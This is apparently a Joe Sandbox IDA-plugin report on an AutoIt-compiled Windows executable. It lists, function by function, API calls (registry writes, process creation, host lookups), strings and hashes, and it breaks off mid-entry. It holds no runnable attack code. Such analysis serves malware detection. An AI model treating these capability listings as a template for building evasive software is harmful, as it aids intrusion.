Part of subcall function 00DBF84C: __dosmaperr.LIBCMT ref: 00DBF8D5

Part of subcall function 00DB889E: __getptd_noexit.LIBCMT ref: 00DB889E

__lseeki64_nolock.LIBCMT ref: 00DC6FBD
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00DC70F2
___createFile.LIBCMT ref: 00DC7111
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00DC711E
__dosmaperr.LIBCMT ref: 00DC7125
__free_osfhnd.LIBCMT ref: 00DC7145
__invoke_watson.LIBCMT ref: 00DC7173
__wsopen_helper.LIBCMT ref: 00DC718D

Strings

@, xrefs: 00DC6D48

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: eff8b45460f86573d53c93814effd6f59b48a9fb94aee499f2660fecc0d621b4
Instruction ID: ce366b7dfcdb8395bc4c3ac7198cf32c510bf25a535760c71114cb74201b2bdf
Opcode Fuzzy Hash: eff8b45460f86573d53c93814effd6f59b48a9fb94aee499f2660fecc0d621b4
Instruction Fuzzy Hash: D922F2719042079BEB299F68DC51FAE7B75EF04320F28822DE562AB2D2C635CD50DB71

Function 00DD76DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 00DD76ED
GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00DD7713
_wcscpy.LIBCMT ref: 00DD7741
_wcscmp.LIBCMT ref: 00DD774C
_wcscat.LIBCMT ref: 00DD7762
_wcsstr.LIBCMT ref: 00DD776D
752A1560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00DD7789
_wcscat.LIBCMT ref: 00DD77D2
_wcscat.LIBCMT ref: 00DD77D9
_wcsncpy.LIBCMT ref: 00DD7804

Strings

DefaultLangCodepage, xrefs: 00DD77EC
\VarFileInfo\Translation, xrefs: 00DD7781
04090000, xrefs: 00DD77BF
%u.%u.%u.%u, xrefs: 00DD7867
StringFileInfo\, xrefs: 00DD775C

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$A1560Size_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1513093770-1459072770
Opcode ID: d321aaeda9a4c8196713b8b0d219aff0c762981335afa998c5e5a59786c00bdf
Instruction ID: c0b01f45e7071c966ade4586e9ae97ad86659e5098f9f841c12da09cbec7b979
Opcode Fuzzy Hash: d321aaeda9a4c8196713b8b0d219aff0c762981335afa998c5e5a59786c00bdf
Instruction Fuzzy Hash: 6C41F5B2904314BAEB01A7749C47EFF7BACDF55710F14009AF502F2192FB64DA1096B1

Function 00D91F04 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9

GetForegroundWindow.USER32 ref: 00D91FBE
IsWindow.USER32(?), ref: 00E0282E

Strings

REGEXPCLASS, xrefs: 00E0267A
LAST, xrefs: 00E025E7
REGEXPTITLE, xrefs: 00E02629
TITLE, xrefs: 00E027C3
CLASS, xrefs: 00E02659
ALL, xrefs: 00E02795
ACTIVE, xrefs: 00E025FD
HANDLE, xrefs: 00E02613
INSTANCE, xrefs: 00E0276D

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: 7b7899761ce4ba5b51e12b1de1a6c4b0a8ed12ef71c9c54dca9902e9fa87093c
Instruction ID: 839338eeb21bb8f49dddd84289ff4f3e19a498e807a6d7f8a965b8e531edc9fe
Opcode Fuzzy Hash: 7b7899761ce4ba5b51e12b1de1a6c4b0a8ed12ef71c9c54dca9902e9fa87093c
Instruction Fuzzy Hash: 56D1F770104602DFCB08EF60D885AA9BBE1FF54344F149A2DF656675E1CB30E999CBB2

Function 00DF352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DF3626
RegCreateKeyExW.KERNEL32(?,?,00000000,00E2DBF0,00000000,?,00000000,?,?), ref: 00DF3694
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00DF36DC
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00DF3765
RegCloseKey.ADVAPI32(?), ref: 00DF3A85
RegCloseKey.ADVAPI32(00000000), ref: 00DF3A92

Strings

REG_EXPAND_SZ, xrefs: 00DF3702
REG_BINARY, xrefs: 00DF3A20
REG_DWORD, xrefs: 00DF3956
REG_SZ, xrefs: 00DF37A3
REG_MULTI_SZ, xrefs: 00DF384D
REG_QWORD, xrefs: 00DF39D3

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: c473b6842045427a07234ca2e763b51ea8295010172bfb5b053800d75be2e936
Instruction ID: 5b475832e4b244f06b504a174246a19cbda01281545c63a6989d19712ce6664d
Opcode Fuzzy Hash: c473b6842045427a07234ca2e763b51ea8295010172bfb5b053800d75be2e936
Instruction Fuzzy Hash: 27027C756046019FCB14EF29C891E2AB7E5FF89724F06845DF98AAB361DB30ED01CB61

Function 00D94257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_FGNEBI.exe,00000104,?,00000000,00000001,00000000), ref: 00D9428C

Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F

Part of subcall function 00DB1BC7: __wcsicmp_l.LIBCMT ref: 00DB1C50

_wcscpy.LIBCMT ref: 00D943C0
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_FGNEBI.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 00E0214E

Strings

/AutoIt3ExecuteScript, xrefs: 00D9438A
CMDLINERAW, xrefs: 00D942AD
C:\Users\user\Desktop\._cache_FGNEBI.exe, xrefs: 00D94283, 00D94288, 00D94292, 00D943BB, 00D943D9, 00E0213B, 00E02192
/AutoIt3OutputDebug, xrefs: 00D94360
/AutoIt3ExecuteLine, xrefs: 00D94375
/ErrorStdOut, xrefs: 00D9434B
CMDLINE, xrefs: 00D942DA, 00D942DF, 00D9430D

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\._cache_FGNEBI.exe$CMDLINE$CMDLINERAW
API String ID: 861526374-2832358210
Opcode ID: d331cd2ceab4ec4c99ec5d237ede78fdb69c1f638a2c51b76e436560f5c19a09
Instruction ID: 87c0c78680ebba98bf04b690b96a4aec44ba301bcebf357efa2ac1c5e5553175
Opcode Fuzzy Hash: d331cd2ceab4ec4c99ec5d237ede78fdb69c1f638a2c51b76e436560f5c19a09
Instruction Fuzzy Hash: D7818176800219AACF05EBE5DD52EEFB7B8EF05350F600459E541B7082EF706A49CBB1

Function 00DAE975 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 170
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00DAEA39
__wsplitpath.LIBCMT ref: 00DAEA56

Part of subcall function 00DB297D: __wsplitpath_helper.LIBCMT ref: 00DB29BD

_wcsncat.LIBCMT ref: 00DAEA69
__makepath.LIBCMT ref: 00DAEA85

Part of subcall function 00DB2BFF: __wmakepath_s.LIBCMT ref: 00DB2C13

Part of subcall function 00DB010A: std::exception::exception.LIBCMT ref: 00DB013E
Part of subcall function 00DB010A: __CxxThrowException@8.LIBCMT ref: 00DB0153

_wcscpy.LIBCMT ref: 00DAEABE

Part of subcall function 00DAEB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00DAEADA,?,?), ref: 00DAEB27

_wcscat.LIBCMT ref: 00E032FC
_wcscat.LIBCMT ref: 00E03334
_wcsncpy.LIBCMT ref: 00E03370

Strings

Include, xrefs: 00DAEA63
", xrefs: 00DAEAEB
\, xrefs: 00E03321

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
String ID: Include$\$"
API String ID: 1213536620-2474423117
Opcode ID: dc0fa9d067a3a00403256614acf113ee3c3ec29cad25766903c5b96b92bcb2b0
Instruction ID: 9378b747d1200e2cf41c20ae6e4fbaba183c922ee1054b2759de77ffb6778a6c
Opcode Fuzzy Hash: dc0fa9d067a3a00403256614acf113ee3c3ec29cad25766903c5b96b92bcb2b0
Instruction Fuzzy Hash: 13518EB64043419FC708EF6AEC85CA7B7E8FB4A301F40491EF645A7261EB749648CB76

Function 00DD78EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 00DD7909
gethostname.WS2_32(?,00000100), ref: 00DD7923
gethostbyname.WS2_32(?), ref: 00DD7930
_wcscpy.LIBCMT ref: 00DD7958
_memmove.LIBCMT ref: 00DD796B
inet_ntoa.WS2_32(?), ref: 00DD7976
_strcat.LIBCMT ref: 00DD7984
_wcscpy.LIBCMT ref: 00DD799B
WSACleanup.WS2_32 ref: 00DD79A9
_wcscpy.LIBCMT ref: 00DD79B7

Strings

0.0.0.0, xrefs: 00DD7952

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: e744a61666f4d527e672169d383c16319d28e98e1f53e483a9a9b9e6f3dcd424
Instruction ID: e2a1a8583c008d4e7b9dd088b5eb9933c3276c237cd02eb4ff95ce347c1573c7
Opcode Fuzzy Hash: e744a61666f4d527e672169d383c16319d28e98e1f53e483a9a9b9e6f3dcd424
Instruction Fuzzy Hash: 3911E772908125AFDB24AB709C5AEDE776CDF01720F0440A7F456A6191FF70DB858A70

Function 00D930A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00D930B0
LoadCursorW.USER32(00000000,00007F00), ref: 00D930BF
LoadIconW.USER32(00000063), ref: 00D930D5
LoadIconW.USER32(000000A4), ref: 00D930E7
LoadIconW.USER32(000000A2), ref: 00D930F9

Part of subcall function 00D9318A: LoadImageW.USER32(00D90000,00000063,00000001,00000010,00000010,00000000), ref: 00D931AE

RegisterClassExW.USER32(?), ref: 00D93167

Part of subcall function 00D92F58: GetSysColorBrush.USER32(0000000F), ref: 00D92F8B
Part of subcall function 00D92F58: RegisterClassExW.USER32(00000030), ref: 00D92FB5
Part of subcall function 00D92F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00D92FC6
Part of subcall function 00D92F58: LoadIconW.USER32(000000A9), ref: 00D93009

Strings

AutoIt v3, xrefs: 00D93156
#, xrefs: 00D93140
0, xrefs: 00D93139

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
String ID: #$0$AutoIt v3
API String ID: 2880975755-4155596026
Opcode ID: 63465be8be27e4b8943364d3e789fd47917c6d1daeb6b92dd994b4f67f450853
Instruction ID: d9c7c115f3d72ec16ea4699216203f91bc5064398d2943c737253d5ebf8071b6
Opcode Fuzzy Hash: 63465be8be27e4b8943364d3e789fd47917c6d1daeb6b92dd994b4f67f450853
Instruction Fuzzy Hash: FF2131B0D45304AFCB04DFAAED49B9DBBF5EB48311F0049AAE614B22E0D77549488FA1

Function 00DEB74B Relevance: 15.3, APIs: 10, Instructions: 324
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 00DEB777
CoInitialize.OLE32(00000000), ref: 00DEB7A4
CoUninitialize.COMBASE ref: 00DEB7AE
GetRunningObjectTable.OLE32(00000000,?), ref: 00DEB8AE
SetErrorMode.KERNEL32(00000001,00000029), ref: 00DEB9DB
CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 00DEBA0F
CoGetObject.OLE32(?,00000000,00E1D91C,?), ref: 00DEBA32
SetErrorMode.KERNEL32(00000000), ref: 00DEBA45
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00DEBAC5
VariantClear.OLEAUT32(00E1D91C), ref: 00DEBAD5

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 88041099075e25b6a30ac199268b376203a67c3396d259c03dc2b75db645b40c
Instruction ID: d94bd3e98c7abf109ed707f3a696c99d41304eafb7eb4e90abf5224e5fb8cc19
Opcode Fuzzy Hash: 88041099075e25b6a30ac199268b376203a67c3396d259c03dc2b75db645b40c
Instruction Fuzzy Hash: 77C12571608345AFC700EF69C88496BB7E9FF89318F04492EF58A9B251DB71ED05CB62

Function 00D92F58 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53
registrywindowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00D92F8B
RegisterClassExW.USER32(00000030), ref: 00D92FB5
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00D92FC6
LoadIconW.USER32(000000A9), ref: 00D93009

Strings

TaskbarCreated, xrefs: 00D92FBB
0, xrefs: 00D92F6D
AutoIt v3 GUI, xrefs: 00D92FA7
+, xrefs: 00D92F74

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Register$BrushClassClipboardColorFormatIconLoad
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 975902462-1005189915
Opcode ID: 6d1bd5ff66fae90613c8dce659139665d18ba72cb23a8830799c558b54b28030
Instruction ID: 04ec9c4ffed42b528546b57be68af408218315fbc6a029ccbb12e0eb385b8480
Opcode Fuzzy Hash: 6d1bd5ff66fae90613c8dce659139665d18ba72cb23a8830799c558b54b28030
Instruction Fuzzy Hash: 9E21EFB5904318AFDB149FA6EC89BCEBBB4FB08701F00855AF611B62A0D7B40548CF91

Function 00DF23C5 Relevance: 13.9, APIs: 9, Instructions: 376
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00DF23E6
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DF2579
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DF259D
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DF25DD
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DF25FF
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DF2760
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00DF2792
CloseHandle.KERNEL32(?), ref: 00DF27C1
CloseHandle.KERNEL32(?), ref: 00DF2838

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 5920427eaef43a07550adce7b5027c61249f7d2e26f3c0910d4ff0e3d854dc7a
Instruction ID: cfc7448dbe4a15d302561da36f0ecd07d6be7bfdc234d7e3e7fe98a08d1afa25
Opcode Fuzzy Hash: 5920427eaef43a07550adce7b5027c61249f7d2e26f3c0910d4ff0e3d854dc7a
Instruction Fuzzy Hash: 02D18B356043059FCB14EF28C891A7ABBE1EF85354F19845DF98A9B2A2DB30DC45CB72

Function 00DEC8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

NULL Pointer assignment, xrefs: 00DECCEE, 00DECCFF
Not an Object type, xrefs: 00DEC916

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: ed49e4e722f9fa8f292b004c2af084a4099de7ac989b3925b6e185d13d5ea132
Instruction ID: 5c14d362e0d20ee46c7b1b790205d5361cbcf67c8002fa90160cdc90a2b4552d
Opcode Fuzzy Hash: ed49e4e722f9fa8f292b004c2af084a4099de7ac989b3925b6e185d13d5ea132
Instruction Fuzzy Hash: 9FE1AE71A10259AFDF10EFA9C881AAE77B5FF48314F189069F945AB281D7709D42CBB0

Function 00DEBF80 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00DEBFD4
VariantInit.OLEAUT32(?), ref: 00DEC0A5
VariantInit.OLEAUT32(?), ref: 00DEC1A6
VariantClear.OLEAUT32(?), ref: 00DEC1B0
VariantClear.OLEAUT32(?), ref: 00DEC211

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00DEC189
Null Object assignment in FOR..IN loop, xrefs: 00DEC035, 00DEC163, 00DEC21F

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
